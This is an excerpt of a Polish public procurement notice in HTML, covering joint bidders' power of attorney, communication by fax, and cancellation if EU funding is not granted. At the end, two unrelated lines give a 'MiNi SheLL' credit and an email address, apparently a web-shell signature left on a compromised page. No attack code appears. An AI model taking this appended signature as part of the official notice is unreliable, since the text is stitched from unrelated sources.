4. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia załączają do wniosku pełnomocnictwo do reprezentowania Wykonawców w trakcie postępowania lub pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy;
5. Pełnomocnictwo powinno być złożone w formie pisemnej (oryginał) lub kopii poświadczonej notarialnie za zgodność z oryginałem;
6. Zamawiający będzie porozumiewał się z Wykonawcami pisemnie oraz za pomocą faksu (dopuszcza możliwość przesłania zaproszeń Wykonawcom do składania ofert również drogą elektroniczną)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com